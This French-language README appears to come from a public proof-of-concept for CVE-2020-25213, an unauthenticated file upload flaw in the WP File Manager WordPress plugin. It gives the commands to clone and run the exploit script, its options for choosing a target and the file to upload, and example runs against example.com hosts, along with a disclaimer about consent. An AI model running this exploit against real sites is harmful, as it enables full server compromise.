
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
Le plugin WordPress WP-file-manager (<6.9) est vulnérable à un téléchargement de fichier arbitraire non authentifié, entraînant un compromis total du système.
Pour plus de détails, consultez mon article publié ici
Je n'ai pas découvert cette vulnérabilité et ne prends aucun crédit pour cette CVE. J'ai seulement créé l'exploit après avoir analysé la description disponible sur divers blogs comme wordfence, seravo avec pour objectif de permettre aux lecteurs de comprendre comment créer un POC en analysant simplement la description de la vulnérabilité.
Je ne suis pas responsable des dommages causés à une organisation utilisant cet exploit et je conseille aux lecteurs de ne pas exploiter cette vulnérabilité sans le consentement écrit de l'organisation, car cela pourrait exposer l'organisation à des attaques d'autres pirates.
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
